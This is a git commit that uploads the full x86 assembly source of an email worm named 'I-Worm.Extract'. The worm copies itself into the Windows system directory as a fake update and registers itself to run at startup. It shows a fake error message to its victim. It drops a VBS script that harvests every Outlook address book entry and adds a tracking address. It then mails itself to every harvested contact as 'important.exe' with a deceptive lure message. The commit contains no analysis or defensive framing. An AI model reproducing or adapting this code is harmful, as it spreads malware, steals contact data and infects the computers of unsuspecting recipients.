Add files via upload

2026-06-16 07:49:24 +00:00 · 2020-10-09 22:25:52 -05:00
parent b7054dfedf
commit 4528c5fb12
23 changed files with 16566 additions and 0 deletions
@@ -0,0 +1,480 @@
+comment #
+Name : I-Worm.Extract
+Author : PetiK
+Date : February 3rd 2002 - February 4th 2002
+Size : 5632
+
+Action :
+#
+
+.586p
+.model flat
+.code
+
+JUMPS
+
+api macro a
+extrn a:proc
+call a
+endm
+
+include Useful.inc
+include myinclude.inc
+
+start_worm:
+	@pushsz "KERNEL32.DLL"
+	api	GetModuleHandleA
+	xchg	eax,ebx
+
+kern	macro x
+	push	offset sz&x
+	push	ebx
+	api	GetProcAddress
+	mov	_ptk&x,eax
+	endm
+
+	kern	CloseHandle
+	kern	CopyFileA
+	kern	CreateDirectoryA
+	kern	CreateFileA
+	kern	CreateFileMappingA
+	kern	DeleteFileA
+	kern	GetDateFormatA
+	kern	GetFileSize
+	kern	GetModuleFileNameA
+	kern	GetSystemDirectoryA
+	kern	GetSystemTime
+	kern	GetTimeFormatA
+	kern	GetWindowsDirectoryA
+	kern	lstrcat
+	kern	lstrcmp
+	kern	lstrcpy
+	kern	lstrlen
+	kern	MapViewOfFile
+	kern	SetCurrentDirectoryA
+	kern	Sleep
+	kern	UnmapViewOfFile
+	kern	WinExec
+	kern	WriteFile
+	kern	WriteProfileStringA
+	kern	WritePrivateProfileStringA
+
+
+	push	50
+	mov	esi,offset orig_worm
+	push	esi
+	push	0
+	call	_ptkGetModuleFileNameA
+
+	push	50
+	push	offset verif_worm
+	call	_ptkGetSystemDirectoryA
+	@pushsz "\UPDATEW32.EXE"
+	push	offset verif_worm
+	call	_ptklstrcat
+
+	push	esi
+	push	offset verif_worm
+	call	_ptklstrcmp
+	test	eax,eax
+	jz	continue_worm
+
+	mov	edi,offset copy_worm
+	push	edi
+	push	50
+	push	edi
+	call	_ptkGetSystemDirectoryA
+	add	edi,eax
+	mov	eax,"dpU\"
+	stosd
+	mov	eax,"Weta"
+	stosd
+	mov	eax,"e.23"
+	stosd
+	mov	eax,"ex"
+	stosd
+	pop	edi
+
+copy_w:	push	0
+	push	edi
+	push	esi
+	call	_ptkCopyFileA
+
+run_w:	push	edi
+	@pushsz "RUN"
+	@pushsz "WINDOWS"
+	call	_ptkWriteProfileStringA
+
+	call	CreateDate
+	push	50
+	push	offset realname
+	push	offset orig_worm
+	api	GetFileTitleA
+
+	@pushsz " - "
+	push	offset date
+	call	_ptklstrcat
+	push	offset realname
+	push	offset date
+	call	_ptklstrcat
+
+f_mess:	push	10h
+	push	offset date
+	call	@mess
+	db	"Cannot Open this File !",CRLF,CRLF
+	db	"If you downloaded this file, try downloading again.",0
+	@mess:
+	push	0
+	api	MessageBoxA
+	jmp	end_worm
+
+continue_worm:
+	push	50
+	push	offset vbsfile
+	call	_ptkGetWindowsDirectoryA
+	@pushsz "\ExtractVbs.vbs"
+	push	offset vbsfile
+	call	_ptklstrcat
+
+	push	0
+	push	20h
+	push	2
+	push	0
+	push	1
+	push	40000000h
+	push	offset vbsfile
+	call	_ptkCreateFileA
+	xchg	eax,ebx
+	push	0
+	push	offset octets
+	push	e_vbs - s_vbs
+	push	offset s_vbs
+	push	ebx
+	call	_ptkWriteFile
+	push	ebx
+	call	_ptkCloseHandle
+
+	push	offset vbsfile
+	push	offset vbsexec
+	call	_ptklstrcpy
+	push	4
+	push	offset execcontrol
+	call	_ptkWinExec
+	push	5000
+	call	_ptkSleep
+	push	offset vbsfile
+	call	_ptkDeleteFileA
+
+payload:
+	push	offset Systime
+	call	_ptkGetSystemTime
+	cmp	[Systime.wDay],29
+	jne	end_pay
+	push	40h
+	@pushsz "I-Worm.Extract"
+	call	e_mess
+	db	"Hi man, you received my worm !",CRLF
+	db	"Don't panic, it doesn't format your computer",CRLF,CRLF
+	db	9,"Bye and Have a Nice Day.",0
+	e_mess:
+	push	0
+	api	MessageBoxA
+end_pay:
+
+sh_gsf:	push	0
+	push	5
+	push	offset progra
+	push	0
+	api	SHGetSpecialFolderPathA
+	push	offset progra
+	call	_ptkSetCurrentDirectoryA
+	@pushsz "Update Windows 32bits"
+	call	_ptkCreateDirectoryA
+	@pushsz "\Update Windows 32bits"
+	push	offset progra
+	call	_ptklstrcat
+	push	offset progra
+	call	_ptkSetCurrentDirectoryA
+	push	0
+	@pushsz "MAJ.exe"
+	push	offset orig_worm
+	call	_ptkCopyFileA
+
+verif_inet:
+	push	0
+	push	offset inet
+	api	InternetGetConnectedState
+	dec	eax
+	jnz	verif_inet
+
+	push	50
+	push	offset winpath
+	call	_ptkGetWindowsDirectoryA
+	push	offset winpath
+	call	_ptkSetCurrentDirectoryA
+
+spread:	pushad
+	push	00h
+	push	80h
+	push	03h
+	push	00h
+	push	01h
+	push	80000000h
+	@pushsz "Outlook_Addr.txt"
+	call	_ptkCreateFileA
+	inc	eax
+	je	end_spread
+	dec	eax
+	xchg	eax,ebx
+
+	xor	eax,eax
+	push	eax
+	push	eax
+	push	eax
+	push	2
+	push	eax
+	push	ebx
+	call	_ptkCreateFileMappingA
+	test	eax,eax
+	je	end_s1
+	xchg	eax,ebp
+
+	xor	eax,eax
+	push	eax
+	push	eax
+	push	eax
+	push	4
+	push	ebp
+	call	_ptkMapViewOfFile
+	test	eax,eax
+	je	end_s2
+	xchg	eax,esi
+
+	push	0
+	push	ebx
+	call	_ptkGetFileSize
+	cmp	eax,4
+	jbe	end_s3
+
+scan_mail:
+	xor	edx,edx
+	mov	edi,offset mail_addr
+	push	edi
+	p_c:	lodsb
+	cmp	al," "
+	je	car_s
+	cmp	al,";"
+	je	end_m
+	cmp	al,"#"
+	je	f_mail
+	cmp	al,'@'
+	jne	not_a
+	inc	edx
+	not_a:	stosb
+		jmp p_c
+	car_s:	inc esi
+		jmp p_c
+	end_m:	xor al,al
+		stosb
+		pop edi
+		test edx,edx
+		je  scan_mail
+		call send_mail
+		jmp scan_mail
+	f_mail:
+
+end_s3:	push	esi
+	call	_ptkUnmapViewOfFile
+end_s2:	push	ebp
+	call	_ptkCloseHandle
+end_s1:	push	ebx
+	call	_ptkCloseHandle
+end_spread: popad
+
+end_worm:
+	push	0
+	api	ExitProcess
+
+send_mail:
+	call	CreateDate
+	call	CreateTime
+	@pushsz "C:\liste.ini"
+	push	offset mail_addr
+	push	offset time
+	push	offset date
+	call	_ptkWritePrivateProfileStringA
+
+	xor	eax,eax
+	push	eax
+	push	eax
+	push	offset Message
+	push	eax
+	push	[sess]
+	api	MAPISendMail
+	ret
+
+CreateDate Proc
+	pushad
+	mov	edi,offset date
+	push	32
+	push	edi
+	@pushsz	"dddd, dd MMMM yyyy"
+	push	0
+	push	0
+	push	9
+	call	_ptkGetDateFormatA
+	popad
+	ret
+CreateDate EndP
+CreateTime Proc
+	pushad
+	mov	edi,offset time
+	push	32
+	push	edi
+	@pushsz	"HH:mm:ss"
+	push	0
+	push	0
+	push	9
+	call	_ptkGetTimeFormatA
+	popad
+	ret
+CreateTime EndP
+
+
+.data
+copy_worm	db 50 dup (0)
+orig_worm	db 50 dup (0)
+verif_worm	db 50 dup (0)
+vbsfile		db 50 dup (0)
+winpath		db 50 dup (0)
+progra		db 50 dup (0)
+mail_addr	db 128 dup (?)
+realname	db 50 dup (0)
+date		db 30 dup (?)
+time		db 9 dup (?)
+octets		dd ?
+inet		dd 0
+sess		dd 0
+
+subject		db "Re: Check This...",0
+body		db "Hi",CRLF
+		db "This is the file you ask for. Open quickly ! It's very important",CRLF,CRLF
+		db 9,"Best Regards",CRLF,CRLF,CRLF
+		db "Salut,",CRLF
+		db "Voici le fichier que tu cherches. Ouvre vite ! C'est trčs important",CRLF,CRLF
+		db 9,"Mes sincčres salutations",0
+filename	db "important.exe",0
+
+Message		dd ?
+		dd offset subject
+		dd offset body
+		dd ?
+		dd ?
+		dd ?
+		dd 2
+		dd offset MsgFrom
+		dd 1
+		dd offset MsgTo
+		dd 1
+		dd offset Attach
+
+MsgFrom		dd ?
+		dd ?
+		dd ?
+		dd ?
+		dd ?
+		dd ?
+
+MsgTo		dd ?
+		dd 1
+		dd offset mail_addr
+		dd offset mail_addr
+		dd ?
+		dd ?
+
+Attach		dd ?
+		dd ?
+		dd ?
+		dd offset orig_worm
+		dd offset filename
+		dd ?
+
+szCloseHandle			db "CloseHandle",0
+szCopyFileA			db "CopyFileA",0
+szCreateDirectoryA		db "CreateDirectoryA",0
+szCreateFileA			db "CreateFileA",0
+szCreateFileMappingA		db "CreateFileMappingA",0
+szDeleteFileA			db "DeleteFileA",0
+szGetDateFormatA		db "GetDateFormatA",0
+szGetFileSize			db "GetFileSize",0
+szGetModuleFileNameA		db "GetModuleFileNameA",0
+szGetSystemDirectoryA		db "GetSystemDirectoryA",0
+szGetSystemTime			db "GetSystemTime",0
+szGetTimeFormatA		db "GetTimeFormatA",0
+szGetWindowsDirectoryA		db "GetWindowsDirectoryA",0
+szlstrcat			db "lstrcat",0
+szlstrcmp			db "lstrcmp",0
+szlstrcpy			db "lstrcpy",0
+szlstrlen			db "lstrlen",0
+szMapViewOfFile			db "MapViewOfFile",0
+szSetCurrentDirectoryA		db "SetCurrentDirectoryA",0
+szSleep				db "Sleep",0
+szUnmapViewOfFile		db "UnmapViewOfFile",0
+szWinExec			db "WinExec",0
+szWriteFile			db "WriteFile",0
+szWritePrivateProfileStringA	db "WritePrivateProfileStringA",0
+szWriteProfileStringA	  	db "WriteProfileStringA",0
+
+_ptkCloseHandle			dd ?
+_ptkCopyFileA			dd ?
+_ptkCreateDirectoryA		dd ?
+_ptkCreateFileA			dd ?
+_ptkCreateFileMappingA		dd ?
+_ptkDeleteFileA			dd ?
+_ptkGetDateFormatA		dd ?
+_ptkGetFileSize			dd ?
+_ptkGetModuleFileNameA		dd ?
+_ptkGetSystemDirectoryA		dd ?
+_ptkGetSystemTime		dd ?
+_ptkGetTimeFormatA		dd ?
+_ptkGetWindowsDirectoryA	dd ?
+_ptklstrcat			dd ?
+_ptklstrcmp			dd ?
+_ptklstrcpy			dd ?
+_ptklstrlen			dd ?
+_ptkMapViewOfFile		dd ?
+_ptkSetCurrentDirectoryA	dd ?
+_ptkSleep			dd ?
+_ptkUnmapViewOfFile		dd ?
+_ptkWinExec			dd ?
+_ptkWriteFile			dd ?
+_ptkWriteProfileStringA 	dd ?
+_ptkWritePrivateProfileStringA	dd ?
+
+s_vbs:	db 'On Error Resume Next',CRLF
+	db 'Set f=CreateObject("Scripting.FileSystemObject")',CRLF
+	db 'Set win=f.GetSpecialFolder(0)',CRLF
+	db 'Set c=f.CreateTextFile(win&"\Outlook_Addr.txt")',CRLF
+	db 'c.Close',CRLF
+	db 'Set out=CreateObject("Outlook.Application")',CRLF
+	db 'Set mapi=out.GetNameSpace("MAPI")',CRLF
+	db 'adr="extractcounter@multimania.com"',CRLF
+	db 'For Each mail in mapi.AddressLists',CRLF
+	db 'If mail.AddressEntries.Count <> 0 Then',CRLF
+	db 'For O=1 To mail.AddressEntries.Count',CRLF
+	db 'adr=adr &";"& mail.AddressEntries(O).Address',CRLF
+	db 'Next',CRLF
+	db 'End If',CRLF
+	db 'Next',CRLF
+	db 'adr=adr &";#"',CRLF,CRLF
+	db 'Set c=f.OpenTextFile(win&"\Outlook_Addr.txt",2)',CRLF
+	db 'c.WriteLine adr',CRLF
+	db 'c.Close',CRLF
+e_vbs:
+
+execcontrol	db "wscript "
+		vbsexec	db 50 dup (0)
+		db "",0
+
+end start_worm
+end